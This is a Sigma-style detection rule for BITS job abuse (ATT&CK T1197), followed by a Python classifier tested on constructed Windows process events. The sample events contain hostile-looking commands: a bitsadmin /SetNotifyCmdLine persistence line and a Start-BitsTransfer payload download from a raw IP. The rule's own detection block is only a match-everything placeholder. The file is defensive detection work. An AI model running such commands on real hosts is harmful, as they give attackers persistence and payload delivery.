title: BITS Jobs (T1197)
id: df00tech-t1197
status: experimental
description: "Adversaries may abuse Windows Background Intelligent Transfer Service (BITS) jobs to persistently execute code and perform background tasks such as downloading malicious payloads, executing arbitrary programs on job completion or error, and cleaning up artifacts. BITS is a COM-based file transfer mechanism built into Windows and commonly used by Windows Update and software installers. Adversaries drive it via bitsadmin.exe or the PowerShell BITS cmdlets to download tools from external infrastructure, achieve persistence by using /SetNotifyCmdLine to invoke an arbitrary executable when a job completes or errors (jobs survive reboots), and exfiltrate data. BITS jobs are stored in a binary job database (%ALLUSERSPROFILE%\\Microsoft\\Network\\Downloader\\) rather than as discrete registry keys or files, so they evade many persistence-focused detections that enumerate those locations. Active threat groups including APT39, APT41, Leviathan, Patchwork, and Wizard Spider have leveraged BITS for payload delivery and persistence."
references:
  - https://attack.mitre.org/techniques/T1197/
  - https://df00tech.com/detections/T1197
author: df00tech
date: 2026/04/18
tags:
  - attack.t1197
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Windows Update and Microsoft patching infrastructure using bitsadmin.exe or the BITS service legitimately — typically originating from TrustedInstaller or the SYSTEM account and downloading from *.windowsupdate.com"
  - "Software deployment tools (SCCM/ConfigMgr, Intune) using BITS for package distribution — the parent process is usually CcmExec.exe or IntuneManagementExtension.exe"
  - "Third-party software updaters (e.g., antivirus updates, browser updaters) that leverage BITS for bandwidth-friendly background downloads"
  - "IT automation scripts using Start-BitsTransfer for legitimate large file transfers to user-accessible shares or deployment directories"
  - "Developer workstations where CI/CD pipelines or build tools invoke bitsadmin.exe for artifact retrieval"
level: high
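The detection block above is a placeholder, so as an added example (not df00tech's KQL/SPL query and not part of the rule) the following Python applies the description's indicators and the falsepositives tuning to constructed process_creation events. The deployment-agent parent image names, the trusted account strings and the sample events are assumptions drawn from the falsepositives text; the /SetNotifyCmdLine branch is deliberately never allow-listed because no listed benign source uses it.

```python
"""Flag BITS abuse in Windows process_creation events; sample events below are constructed."""
import re

# bitsadmin.exe switches and PowerShell cmdlets that stage or run a BITS job.
BITSADMIN_SWITCHES = ("/transfer", "/addfile", "/setnotifycmdline", "/resume", "/create")
PS_CMDLETS = ("start-bitstransfer", "set-bitstransfer", "add-bitsfile")
# Tuning derived from the rule's falsepositives; parent image names are assumed.
DEPLOYMENT_PARENTS = ("ccmexec.exe", "intunemanagementextension.exe")
TRUSTED_USERS = ("nt authority\\system", "nt service\\trustedinstaller")
URL_RE = re.compile(r"https?://([^/\s\"']+)")

def classify(event: dict):
    """Return a finding label for one event, or None when it matches an allow-list entry."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "").lower()
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    user = event.get("User", "").lower()
    is_bitsadmin = image == "bitsadmin.exe" and any(s in cmd for s in BITSADMIN_SWITCHES)
    is_ps_bits = image in ("powershell.exe", "pwsh.exe") and any(c in cmd for c in PS_CMDLETS)
    if not (is_bitsadmin or is_ps_bits):
        return None
    # A notify command line is the persistence primitive; none of the benign sources in the
    # falsepositives list use it, so it is reported regardless of parent or account.
    if "/setnotifycmdline" in cmd or "-notifycmdline" in cmd:
        return "bits_persistence_notifycmdline"
    # Allow-list: deployment agents by parent, Windows Update as SYSTEM from *.windowsupdate.com.
    if parent in DEPLOYMENT_PARENTS:
        return None
    hosts = URL_RE.findall(cmd)
    if hosts and user in TRUSTED_USERS and all(h.endswith(".windowsupdate.com") for h in hosts):
        return None
    return "bits_download"

SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "bitsadmin /transfer wu /download /priority normal "
     "http://dl.windowsupdate.com/kb.cab C:\\Windows\\Temp\\kb.cab"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"CORP\jdoe", "CommandLine": 'bitsadmin /SetNotifyCmdLine job1 "C:\\Users\\Public\\run.exe" NULL'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "User": r"NT AUTHORITY\SYSTEM", "CommandLine": "powershell -c Start-BitsTransfer -Source http://pkg.corp.example/app.msi -Destination C:\\Windows\\Temp\\app.msi"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe", "CommandLine": "powershell -c Start-BitsTransfer -Source http://203.0.113.10/a.dat -Destination C:\\Users\\Public\\a.dat"},
]

def findings(events=SAMPLE_EVENTS):
    """Labels for every event that is not allow-listed, in input order."""
    return [lab for lab in map(classify, events) if lab]
```

Feeding real Sysmon Event ID 1 or Security 4688 records into classify() only requires mapping their field names onto Image, CommandLine, ParentImage and User.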
